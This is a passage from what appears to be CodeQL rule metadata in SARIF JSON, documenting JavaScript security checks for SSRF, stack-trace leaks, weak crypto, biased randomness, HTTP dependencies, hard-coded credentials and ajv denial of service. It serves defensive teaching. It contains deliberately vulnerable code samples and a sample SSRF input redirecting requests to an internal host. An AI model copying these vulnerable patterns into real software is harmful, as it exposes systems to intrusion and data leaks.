A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. 
For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-918" ], + "description" : "Making a network request with user-controlled data in the URL allows for request forgery attacks.", + "id" : "js/request-forgery", + "kind" : "path-problem", + "name" : "Server-side request forgery", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/stack-trace-exposure", + "name" : "js/stack-trace-exposure", + "shortDescription" : { + "text" : "Information exposure 
through a stack trace" + }, + "fullDescription" : { + "text" : "Propagating stack trace information to an external user can unintentionally reveal implementation details that are useful to an attacker for developing a subsequent exploit." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. 
As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n", + "markdown" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. 
In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. 
That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-209", "external/cwe/cwe-497" ], + "description" : "Propagating stack trace information to an external user can\n unintentionally reveal implementation details that are useful\n to an attacker for developing a subsequent exploit.", + "id" : "js/stack-trace-exposure", + "kind" : "path-problem", + "name" : "Information exposure through a stack trace", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "5.4" + } + }, { + "id" : "js/weak-cryptographic-algorithm", + "name" : "js/weak-cryptographic-algorithm", + "shortDescription" : { + "text" : "Use of a broken or weak cryptographic algorithm" + }, + "fullDescription" : { + "text" : "Using broken or weak cryptographic algorithms can compromise security." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* 
Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n", + "markdown" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. 
The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-327", "external/cwe/cwe-328" ], + "description" : "Using broken or weak cryptographic algorithms can compromise security.", + "id" : "js/weak-cryptographic-algorithm", + "kind" : "path-problem", + "name" : "Use of a broken or weak cryptographic algorithm", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/biased-cryptographic-random", + "name" : "js/biased-cryptographic-random", + "shortDescription" : { + "text" : "Creating biased random numbers from a cryptographically secure source." + }, + "fullDescription" : { + "text" : "Some mathematical operations on random numbers can cause bias in the results and compromise security." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", + "markdown" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. 
Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-327" ], + "description" : "Some mathematical operations on random numbers can cause bias in\n the results and compromise security.", + "id" : "js/biased-cryptographic-random", + "kind" : "problem", + "name" : "Creating biased random numbers from a cryptographically secure source.", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/insecure-dependency", + "name" : "js/insecure-dependency", + "shortDescription" : { + "text" : "Dependency download using unencrypted communication channel" + }, + "fullDescription" : { + "text" : "Using unencrypted protocols to fetch dependencies can leave an application open to man-in-the-middle attacks." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. 
](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", + "markdown" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! 
](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-300", "external/cwe/cwe-319", "external/cwe/cwe-494", "external/cwe/cwe-829" ], + "description" : "Using unencrypted protocols to fetch dependencies can leave an application\n open to man-in-the-middle attacks.", + "id" : "js/insecure-dependency", + "kind" : "problem", + "name" : "Dependency download using unencrypted communication channel", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "8.1" + } + }, { + "id" : "js/hardcoded-credentials", + "name" : "js/hardcoded-credentials", + "shortDescription" : { + "text" : "Hard-coded credentials" + }, + "fullDescription" : { + "text" : "Hard-coding credentials in source code may enable an attacker to gain unauthorized access." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. 
For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst 
pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", + "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. 
If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded 
password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-259", "external/cwe/cwe-321", "external/cwe/cwe-798" ], + "description" : "Hard-coding credentials in source code may enable an attacker\n to gain unauthorized access.", + "id" : "js/hardcoded-credentials", + "kind" : "path-problem", + "name" : "Hard-coded credentials", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.8" + } + }, { + "id" : "js/resource-exhaustion-from-deep-object-traversal", + "name" : "js/resource-exhaustion-from-deep-object-traversal", + "shortDescription" : { + "text" : "Resources exhaustion from deep object traversal" + }, + "fullDescription" : { + "text" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. 
This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. 
An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-400" ], + "description" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service.", + "id" : 
